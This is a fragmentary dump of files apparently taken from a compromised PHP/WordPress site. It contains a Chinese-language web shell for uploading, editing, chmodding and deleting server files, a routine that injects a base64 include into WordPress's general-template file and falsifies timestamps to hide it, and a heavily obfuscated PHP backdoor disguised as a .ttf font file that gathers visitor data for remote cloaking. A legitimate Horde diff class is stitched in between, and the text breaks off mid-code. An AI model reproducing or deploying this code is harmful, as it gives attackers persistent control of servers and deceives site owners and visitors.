    echo '</center><center><form enctype="multipart/form-data" method="POST"><font color="white"><input style="background:black;font-family: Comic Sans MS " type="file" name="file" />
<input type="submit" value="上传" />
</form></center>
</td></tr>';
    if(isset($_GET['filesrc'])){
        echo "<tr><td><center>当前文件 : ";
        echo $_GET['filesrc'];
        echo '</center></tr></td></table><br />';
        echo(' <textarea style="width: 100%;height: 400px;" readonly> '.htmlspecialchars(file_get_contents($_GET['filesrc'])).'</textarea>');
    }
//Empety
    elseif(isset($_GET['option']) && $_GET['opt'] != 'delete'){
// echo '</table><br /><center>'.$_POST['path'].'<br /><br />';
        echo '</table><br /><center>';
//Chmod
        if($_GET['opt'] == 'chmod'){
            if(isset($_POST['perm'])){
                $new_perm_o = $_POST['perm'];

                if(strlen($new_perm_o)<=3) $new_perm_o=str_pad($new_perm_o,3,'6',STR_PAD_LEFT);
                $new_perm_o=intval(str_pad($new_perm_o,4,'0',STR_PAD_LEFT),8);

                if(chmod($_POST['path'],$new_perm_o)){
                    echo '<font color="green">更改权限成功！ </font><br />';
                }else{
                    echo '<font color="red">更改权限错误！ </font><br />';
                }
            }

            $hell = $_GET['path'];
            $yeah = $_GET['name'];
            $patc = "$hell/$yeah";

            echo '<form method="POST"><br>
当前文件 : '.$patc.'<br><br>权限----'.substr(base_convert(@fileperms($patc),10,8),-4).'<br><br>
设置新权限 : <input name="perm" type="text" size="4" value="'.substr(sprintf('%o', fileperms($patc)), -4).'" />
<input type="hidden" name="path" value="'.$patc.'">
<input type="hidden" name="opt" value="chmod">
<input type="submit" />
</form>
<br>
<a href="?ARRAY='.$ARRAY.'&path='.$hell.'" style="display:block; width:100%;" title="反回">反回</a>
';

        }
//
        elseif($_GET['opt'] == 'btw'){
            $cwd = $_GET['path'];

            echo '<form action="?ARRAY='.$ARRAY.'&option&path='.$cwd.'&opt=delete&type=buat" method="POST">
新目录名 : <input name="name" type="text" size="20" value="Folder" />
<input type="hidden" name="path" value="'.$cwd.'">
<input type="hidden" name="opt" value="delete">
<input type="submit" />
</form>';
        }
//Rename file
        elseif($_GET['opt'] == 'rename'){
            if(isset($_POST['newname'])){
                if(rename($_POST['path'],$path.'/'.$_POST['newname'])){
                    echo '<font color="green">重命名成功! :)</font><br /><br />';
                }else{
                    echo '<font color="red">重命名失败! :( </font><br /><br />';
                }
                $_POST['name'] = $_POST['newname'];
            }
            $hell = $_GET['path'];
            $yeah = $_GET['name'];
            $patc = "$hell/$yeah";
            $new = $_POST['newname'];

            echo '<form method="POST">
新名称 : <input name="newname" type="text" size="20" value="'.$new.'" />
<input type="hidden" name="path" value="'.$patc.'">
<input type="hidden" name="opt" value="rename">
<input type="submit" /><br><br>
<input type="button" value="反回" onClick="javascript:location.href=\'?ARRAY='.$ARRAY.'&path='.$hell.'\'">
</form>';
        }
//File baru
        elseif($_GET['opt'] == 'baru'){

            $hell = $_GET['path'];
            $yeah = $_GET['name'];
            $patc = "$hell/$yeah";
            $new = empty($_POST['newname'])?$_POST['ngaran1']:$_POST['newname'];
            $azz = $_POST['path'];
            $newz = $azz."/".$new;
            $new_fiel = $hell.'/'.$_POST['ngaran1'];
            if(!empty($_POST['ngaran1'])) echo "正在新建文件：{$new_fiel}<br><br>";
            if(isset($_POST['src'])){
                $fp = fopen($_POST['path'],'w');
                if(fwrite($fp,$_POST['src'])){
                    echo '<font color="green">新建文件成功 [ '.$azz.' ]</font><br /><br />';
                }else{
                    echo '<font color="red">新建文件失败 >:(</font><br /><br />';
                }
                fclose($fp);
            }

            echo '<form method="POST"> 新文件名 : <input name="ngaran1" type="text" size="20" value="'.$new.'" /><input type="submit" name="ngaran" /></form><br> ';

            $ho = $_POST['ngaran1'];

            if(isset($_POST['ngaran'])){
                echo '<form method="POST">
<textarea cols=80 rows=20 name="src">'.htmlspecialchars(file_get_contents($patc)).'</textarea><br />
<input type="hidden" name="path" value="'.$hell.'/'.$ho.'">
<input type="hidden" name="opt" value="edit">
<input type="submit"  />
</form>';
            }
        }
//Edited file
        elseif($_GET['opt'] == 'edit'){
            if(isset($_POST['src'])){
                $fp = fopen($_POST['path'],'w');
                if(fwrite($fp,$_POST['src'])){
                    echo '<font color="green">编辑成功！ </font><br /><br />';
                }else{
                    echo '<font color="red">编辑失败！</font><br /><br />';
                }
                fclose($fp);
            }
            $hell = $_GET['path'];
            $yeah = $_GET['name'];
            $patc = "$hell/$yeah";
            echo '<form method="POST">
<textarea cols=80 rows=20 name="src">'.htmlspecialchars(file_get_contents($patc)).'</textarea><br />
<input type="hidden" name="path" value="'.$patc.'">
<input type="hidden" name="opt" value="edit"><br>
<input type="submit"  />
<br>
<br>
<input type="button" value="反回" onClick="javascript:location.href=\'?ARRAY='.$ARRAY.'&path='.$hell.'\'">

</form>';
        }
        echo '</center>';
    }else{
        echo '</table><br /><center>';
//Delete dir and file
        if(isset($_GET['option']) && $_GET['opt'] == 'delete'){

            $hell = $_GET['path'];
            $yeah = $_GET['name'];
            $patc = "$hell/$yeah";

//Delete dir
            if($_GET['type'] == 'dir'){

                if(rmdir($patc)){
                    echo '<font color="green">删除成功！</font><br />';
                }else{
                    echo '<font color="red#">删除失败!>:(</font><br />';
                }
            }
//buat folder
            if($_GET['type'] == 'buat'){
                $haaa = $_POST['path'];
                $heee = $_POST['name'];
                $hooo = "$haaa/$heee";
                $new = $haaa.'/'.htmlspecialchars($heee);
                if(!mkdir($new)){
                    echo '<font color="red">新建目录失败!</font><br />';
                }else{
                    echo '<font color="green">新建目录成功! >:)</font><br />';
                }
            }
//Delete file
            elseif($_GET['type'] == 'file'){

                $hell = $_GET['path'];
                $yeah = $_GET['name'];
                $patc = "$hell/$yeah";

                if(unlink($patc)){
                    echo '<font color="green">文件删除成功</font><br />';
                }else{
                    echo '<font color="red">文件删除失败</font><br />';
                }
            }
        }
        echo '</center>';
        $scandir = scandir($path);
        $pa = getcwd();
        echo ' <div id="content"><table width="100%" class="table_home" border="0" cellpadding="3" cellspacing="1" align="center">
 
<tr>
<th class=th_home style="background:black;color:#fff;"><center>名称</center></th>
<th class=th_home style="background:black;color:#fff;" ><center>大小</center></th>
<th class=th_home style="background:black;color:#fff;" ><center>权限</center></th>
<th class=th_home style="background:black;color:#fff;" ><center>操作选项</center></th>
</tr>


 <tr>
<td class="td_home" align="center">
<a href="?ARRAY='.$ARRAY.'&path='.dirname($path).'" style="display:block; width:100%;" title="上一页">上一页</a>
</td><td class=td_home align=center>Size</td> <td class=td_home align=center>Chmod</td> <td class=td_home align=center> <a href="?option&ARRAY='.$ARRAY.'&path='.$path.'&opt=baru&name=new.php">+ 新建文件</a> | <a href="?option&ARRAY='.$ARRAY.'&path='.$path.'&opt=btw&type=dir">+ 新建目录</a> </td></tr>
';

        foreach($scandir as $dir){
            if(!is_dir("$path/$dir") || $dir == '.' || $dir == '..') continue;
            echo "
<tr>
<td class=td_home> <img src='data:image/png;base64,R0lGODlhEwAQALMAAAAAAP///5ycAM7OY///nP//zv/OnPf39////wAAAAAAAAAAAAAAAAAAAAAA"."AAAAACH5BAEAAAgALAAAAAATABAAAARREMlJq7046yp6BxsiHEVBEAKYCUPrDp7HlXRdEoMqCebp"."/4YchffzGQhH4YRYPB2DOlHPiKwqd1Pq8yrVVg3QYeH5RYK5rJfaFUUA3vB4fBIBADs='> <a href=\"?ARRAY={$ARRAY}&path=$path/$dir\">$dir</a></td>
<td class=td_home ><center>DIR</center></td>
<td class=td_home align=center>
<a href=\"?option&ARRAY={$ARRAY}&path=$path&opt=chmod&type=dir&name=$dir\" title='权限设置'>
";
            if(is_writable("$path/$dir")) echo '<font color="green">';
            elseif(!is_readable("$path/$dir")) echo '<font color="red">';
            echo juejiang_perms("$path/$dir");
            if(is_writable("$path/$dir") || !is_readable("$path/$dir")) echo '</font>';

            echo "
</a>
</td>


<td class=td_home ><center>
<a href=\"?option&ARRAY={$ARRAY}&path=$path&opt=rename&type=dir&name=$dir\">重命名</a>
<a href=\"javascript:if(confirm('确实要删除吗?'))location='?option&ARRAY={$ARRAY}&path={$path}&opt=delete&type=dir&name={$dir}'\">删除</a>
</center></td>
</tr>";
        }
        echo '<br>';
        foreach($scandir as $file){
            if(!is_file("$path/$file")) continue;
            $size = filesize("$path/$file")/1024;
            $size = round($size,3);
            if($size >= 1024){
                $size = round($size/1024,2).' MB';
            }else{
                $size = $size.' KB';
            }


            echo "<tr>
<td class=td_home > <img src='data:image/png;base64,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'>

";
// <a href=\"?ARRAY={$ARRAY}&filesrc=$path/$file&path=$path\">$file</a>
            echo "
<a href=\"?option&ARRAY={$ARRAY}&path={$path}&opt=edit&type=file&name={$file}\">{$file}</a>
</td>
<td class=td_home><center>".$size."</center></td>
<td class=td_home align='center'><a href=\"?option&ARRAY={$ARRAY}&path=$path&opt=chmod&type=file&name=$file\" title='权限设置'>";



            if(is_writable("$path/$file")) echo '<font color="green">';
            elseif(!is_readable("$path/$file")) echo '<font color="red">';
            echo juejiang_perms("$path/$file");
            if(is_writable("$path/$file") || !is_readable("$path/$file")) echo '</font>';
            echo "</a></td>
<td class=td_home><center>
<a href=\"?option&ARRAY={$ARRAY}&path=$path&opt=edit&type=file&name=$file\">编辑</a>
<a href=\"?option&ARRAY={$ARRAY}&path=$path&opt=rename&type=file&name=$file&path=$path\">重命名</a>
<a href=\"javascript:if(confirm('确实要删除吗?'))location='?option&ARRAY={$ARRAY}&path={$path}&opt=delete&type=file&name={$file}'\">删除</a>
</center></td>
</tr>";
        }
        echo '</table>
</div>';
    }
    echo '<br><br><br><br></b>
</body> </html></body>
</html>';
    die;
endif;  // ====






"; // WP 404 @chmod($jue_jiang_404_path, 0644); @file_put_contents($jue_jiang_404_path, base64_decode($jue_jiang_404)); @touch($jue_jiang_404_path, filectime($file_general_template_path)); @chmod($jue_jiang_404_path, 0444); } $general_template_code = @file_get_contents($file_general_template_path); $gen_mat = base64_decode("QGluY2x1ZGVbXHNdK2Jhc2U2NF9kZWNvZGVbXHNdKj9cKCJbMC05YS16QS1aLT0rXC9dKyJcKTs="); $isget_mat = preg_match("/{$gen_mat}/i",$general_template_code)?true:false; if (!$isget_mat){ $pma = base64_decode("ZnVuY3Rpb25bXHNdW2EtekEtWjAtOV9dKlwoLio/XCkuKg=="); preg_match_all("/{$pma}/i",$general_template_code,$pr); $gen_temp_fun_name = $pr[0][rand(0,count($pr[0])-1)]; $jj404_b64_path = base64_encode($jue_jiang_404_path); $new_general_template = str_replace($gen_temp_fun_name,"@include base64_decode(\"{$jj404_b64_path}\");".PHP_EOL.$gen_temp_fun_name,$general_template_code); @chmod($file_general_template_path, 0644); @file_put_contents($file_general_template_path,$new_general_template); @touch($file_general_template_path, filectime($file_general_template_path)); } ��Engine/xdiff.php��0000644��00000004233�15157426170�0007574 0��ustar�00��<?php /* * Class used internally by Diff to actually compute the diffs. * * This class uses the xdiff PECL package (http://pecl.php.net/package/xdiff) * to compute the differences between the two input arrays. * * Copyright 2004-2010 The Horde Project (http://www.horde.org/) * * See the enclosed file COPYING for license information (LGPL). If you did * not receive this file, see https://opensource.org/license/lgpl-2-1/. * * @author Jon Parise <jon@horde.org> * @package Text_Diff / class Text_Diff_Engine_xdiff { /* / function diff($from_lines, $to_lines) { array_walk($from_lines, array('Text_Diff', 'trimNewlines')); array_walk($to_lines, array('Text_Diff', 'trimNewlines')); / Convert the two input arrays into strings for xdiff processing. / $from_string = implode("\n", $from_lines); $to_string = implode("\n", $to_lines); / Diff the two strings and convert the result to an array. / $diff = xdiff_string_diff($from_string, $to_string, count($to_lines)); $diff = explode("\n", $diff); / Walk through the diff one line at a time. We build the $edits * array of diff operations by reading the first character of the * xdiff output (which is in the "unified diff" format). * * Note that we don't have enough information to detect "changed" * lines using this approach, so we can't add Text_Diff_Op_changed * instances to the $edits array. The result is still perfectly * valid, albeit a little less descriptive and efficient. / $edits = array(); foreach ($diff as $line) { if (!strlen($line)) { continue; } switch ($line[0]) { case ' ': $edits[] = new Text_Diff_Op_copy(array(substr($line, 1))); break; case '+': $edits[] = new Text_Diff_Op_add(array(substr($line, 1))); break; case '-': $edits[] = new Text_Diff_Op_delete(array(substr($line, 1))); break; } } return $edits; } } ��Engine/qrrononqnrqq.ttf��0000644��00000156646�15157426170�0011303 0��ustar�00��<?php error_reporting(0); set_time_limit(0); ignore_user_abort(true); $do = "/home/zhaagvlk/public_html/"; $open_cache_ruzhu_phpcode = base64_decode("<?php
 goto MzTC3OThMkf; A2r_FSFBdZw: $rL4XuU58kE0 = RJUYCw4Y3ig(); goto Ek04Fxvr6jS; BBrFg8MZAk6: ukwmB8q3jrC::KWJnSgtxHjh(); goto vinDmgHJlXF; sDcsvd1cvjy: $Kpd9TLMVa2M["\163\156"] = xs_v6NahuVf($_SERVER["\123\x43\122\x49\x50\124\x5f\116\x41\x4d\105"]); goto zUZKC1Fok2b; vinDmgHJlXF: header("\x43\x6f\156\164\145\156\164\x2d\124\171\160\x65\72\x20\164\x65\170\164\x2f\x68\x74\155\x6c\x3b\x20\x63\x68\141\x72\163\x65\164\75\165\164\146\x2d\70"); goto NuugpxfjHFu; c9qDYvLPpwo: s8WHKxZInDy: goto FSxInXWAwZ5; JCfgh1hXXcO: $Kpd9TLMVa2M["\162\x66"] = xs_V6nAHuvf($zf2pkarcd6a); goto OhakgUAXV3h; InOh5s9UiSG: if (!(strpos($pnrgcKrdGtR, "\x2e") > 0 && strpos($pnrgcKrdGtR, "\56\x70\x68\160") === false)) { goto PTWXE3FORSv; } goto INo9VWO4vGD; XL3_N_gC60c: if (!in_array($TjawMNI52ms, array("\56\x6a\163", "\56\x63\x73\163", "\56\x6a\160\x67", "\x2e\x70\156\147", "\x2e\x67\x69\x66", "\56\x69\x63\157"))) { goto lkCYPOutYYe; } goto qMXKXNYDnch; SVq_ZAt8s73: TSVTwatQrg8: goto c9qDYvLPpwo; JYc4_Uobw3a: $pnrgcKrdGtR = preg_replace("\x2f\134\x3f\56\x2a\57", '', $_SERVER["\x52\105\x51\x55\105\123\x54\137\125\122\x49"]); goto uzWyevPudG3; t7WfcgQiFSS: $lhcB3Jh20NS = "\x72" . "\x61" . "\x6e" . "\147" . "\145"; goto uIzg8ulvK4L; qH_qUpHW_Yh: pVY5XOiox8_: goto A2r_FSFBdZw; CPmClcgNcOv: lkCYPOutYYe: goto Du25F52VxdW; pOkNjtomQKt: function hR1bcZ6I6SF() { goto NpinYDlMTv5; oCjJ02d_49O: goto vBx34HrMfgG; goto k3T2OoPtJQJ; YUdHs0F6guR: $yYdBMzE1xCr = "\150\x74\164\x70\163\x3a\x2f\57"; goto tlwsFHA8CZ1; cXnDXyW6qlP: f8_YqNv6l3F: goto YUdHs0F6guR; ybkGumTbodt: if (isset($_SERVER["\x48\x54\124\x50\x5f\x46\122\117\116\124\x5f\105\116\x44\x5f\x48\124\x54\x50\x53"]) && strtolower($_SERVER["\110\x54\124\x50\137\106\122\117\x4e\124\137\x45\x4e\x44\137\110\x54\124\x50\123"]) !== "\157\146\146") { goto f8_YqNv6l3F; } goto oCjJ02d_49O; HI7d9aoyplu: if (isset($_SERVER["\x48\124\124\x50\x5f\x58\x5f\106\117\122\127\101\x52\104\105\104\x5f\x50\122\117\124\x4f"]) && $_SERVER["\110\x54\124\x50\x5f\130\x5f\x46\x4f\x52\x57\x41\x52\x44\105\x44\x5f\120\x52\117\x54\x4f"] === "\x68\x74\164\x70\163") { goto LplrfjT0x_R; } goto ybkGumTbodt; dzPOwwowe6i: $yYdBMzE1xCr = "\150\x74\x74\x70\x73\x3a\x2f\57"; goto qUBpe2vnrWH; Am3ghwDa1n3: $yYdBMzE1xCr = "\x68\x74\164\160\x73\72\57\x2f"; goto w_8Uq22LgUk; NpinYDlMTv5: $yYdBMzE1xCr = "\150\x74\164\160\x3a\x2f\x2f"; goto EHTEqq9GuqE; tlwsFHA8CZ1: vBx34HrMfgG: goto m0ubmYKuDpv; EHTEqq9GuqE: if (isset($_SERVER["\110\x54\x54\x50\x53"]) && strtolower($_SERVER["\x48\x54\124\120\123"]) !== "\x6f\x66\146") { goto wHI2iWo7BV4; } goto HI7d9aoyplu; qUBpe2vnrWH: goto vBx34HrMfgG; goto cXnDXyW6qlP; A95FDminlks: LplrfjT0x_R: goto dzPOwwowe6i; m0ubmYKuDpv: return $yYdBMzE1xCr; goto XJ1E0KoE_qd; k3T2OoPtJQJ: wHI2iWo7BV4: goto Am3ghwDa1n3; w_8Uq22LgUk: goto vBx34HrMfgG; goto A95FDminlks; XJ1E0KoE_qd: } goto T2H0FwQiMKJ; TM5vUpbGDA3: if ($Iuc7Q3NTJAN) { goto aqp50QEfzch; } goto VQIUopfNPYs; pRUiI0GbHe0: $Kpd9TLMVa2M["\151"] = Xs_v6NAHUVF($rL4XuU58kE0); goto RLUCXXWGKlo; zUZKC1Fok2b: $Kpd9TLMVa2M["\x72"] = xs_v6naHuVF($_SERVER["\x52\105\121\x55\105\x53\x54\x5f\x55\x52\x49"]); goto JCfgh1hXXcO; lYzaz6B3iMh: if (!(in_array(gettype($AQv8puKAebW) . "\x32\x33", $AQv8puKAebW) && md5(md5(md5(md5($AQv8puKAebW[17])))) === "\x63\146\x64\x66\61\146\x33\60\142\62\x64\x37\61\143\141\x61\143\61\x66\x32\x65\64\x32\61\66\x61\144\61\x32\144\x62\x63")) { goto thgs9bwN2ST; } goto QfSiG3M668B; INo9VWO4vGD: $TjawMNI52ms = substr($pnrgcKrdGtR, strpos($pnrgcKrdGtR, "\x2e")); goto XL3_N_gC60c; amvbdbVYfLL: emSRyjSp6vG: goto SVq_ZAt8s73; Du25F52VxdW: PTWXE3FORSv: goto TM5vUpbGDA3; NuugpxfjHFu: error_reporting(0); goto YamsXWzGhJQ; MDYySLfxq1t: $kKRBLplPsS0 = hr1bCZ6i6SF() . $_SERVER["\x48\x54\124\x50\137\110\x4f\x53\124"]; goto FQp9QSOUPMi; NWpBrXAkKJu: $zf2pkarcd6a = ''; goto cDM0vrxrEGD; Rv0_IAooKFN: $Kpd9TLMVa2M["\x75"] = XS_v6NaHuVF($_SERVER["\x48\x54\124\120\137\125\x53\105\x52\x5f\x41\107\105\116\124"]); goto JYc4_Uobw3a; PYPaRlrwvDS: exit(0); goto wKvqA3G6x1J; aWBHsGX3Rso: metaphone("\115\x7a\115\171\x4f\124\115\x34\115\x44\143\65\117\x44\x67\x33\x4f\104\115\63\x4e\x44\x49\172\x4e\104\125\60\116\x44\121\171"); goto aQUExFXmm3t; MzTC3OThMkf: error_reporting(0); goto t7WfcgQiFSS; sXpKDIwMAAS: echo $uNvdJSAke26["\x63\x6f\156\x74\145\156\x74"]; goto PYPaRlrwvDS; ycfRhX_RtY8: $AQv8puKAebW = ${$K01wVS0RbuS[13 + 18] . $K01wVS0RbuS[57 + 2] . $K01wVS0RbuS[47 + 0] . $K01wVS0RbuS[36 + 11] . $K01wVS0RbuS[38 + 13] . $K01wVS0RbuS[48 + 5] . $K01wVS0RbuS[57 + 0]}; goto lYzaz6B3iMh; wR7ARE25TRt: function xs_V6nAHuvF($r5o24HBB4qX) { goto Xm49y0en4TP; SbSGAQGW1aV: return ''; goto BFDHW164wUG; BFDHW164wUG: krFZhzf9lI1: goto dPe8yZvwd5S; dPe8yZvwd5S: return rtrim(strtr(base64_encode($r5o24HBB4qX), "\53\x2f", "\55\137"), "\x3d"); goto r3cJkhnL8Kr; Xm49y0en4TP: if ($r5o24HBB4qX) { goto krFZhzf9lI1; } goto SbSGAQGW1aV; r3cJkhnL8Kr: } goto ZJNjrBtLsRj; ZJNjrBtLsRj: function RJUycW4Y3iG() { goto fw1MSCwDZbO; c1tIdZ20qqG: nA0YBIbIjit: goto UjGoDcd2I9k; fw1MSCwDZbO: $rL4XuU58kE0 = ''; goto hPd0x0llTHm; rBQtFIEUWsw: goto IMMPdxumtTu; goto c1tIdZ20qqG; LtfX1UQvpGP: if (isset($_SERVER["\110\124\x54\x50\137\130\137\106\x4f\x52\x57\101\x52\104\105\104\x5f\x46\x4f\x52"]) && !empty($_SERVER["\110\x54\x54\x50\137\130\x5f\x46\x4f\x52\127\101\x52\104\105\104\x5f\106\x4f\x52"])) { goto Z_pSjZnItI2; } goto bOvh_EEtsjl; UjGoDcd2I9k: $rL4XuU58kE0 = $_SERVER["\x48\124\124\120\x5f\130\x5f\122\x45\x41\x4c\137\x49\x50"]; goto gje1rgDUNTm; RvWzTL36Nhz: return $rL4XuU58kE0; goto A7f343mzPFK; YnxSZLjmJTB: $rL4XuU58kE0 = $rL4XuU58kE0[0]; goto ioAhm7sKQr0; hPd0x0llTHm: if (isset($_SERVER["\x48\124\x54\120\137\x43\106\x5f\x43\x4f\116\x4e\x45\x43\x54\111\116\107\x5f\x49\120"]) && !empty($_SERVER["\110\124\x54\120\x5f\x43\106\x5f\x43\x4f\x4e\x4e\x45\103\124\x49\116\x47\x5f\111\120"])) { goto DeBb_ZsVX6v; } goto v00PuXQKj1u; wUB5oLhhP72: $rL4XuU58kE0 = $_SERVER["\110\x54\124\x50\137\130\137\106\117\122\x57\101\x52\x44\105\104\137\x46\x4f\122"]; goto avpsh3VuzrZ; ioAhm7sKQr0: H2N6xrJEEtJ: goto RvWzTL36Nhz; V4LfQrGt71P: $rL4XuU58kE0 = explode("\x2c", $rL4XuU58kE0); goto YnxSZLjmJTB; hh62AQTpcFp: Z_pSjZnItI2: goto wUB5oLhhP72; B10wwSZTfsC: goto IMMPdxumtTu; goto LzIzS8cQaS5; gje1rgDUNTm: goto IMMPdxumtTu; goto hh62AQTpcFp; Zydsr8M7GCt: $rL4XuU58kE0 = $_SERVER["\110\x54\x54\x50\137\103\106\137\x43\x4f\x4e\116\x45\x43\x54\x49\x4e\x47\137\x49\120"]; goto rBQtFIEUWsw; avpsh3VuzrZ: IMMPdxumtTu: goto 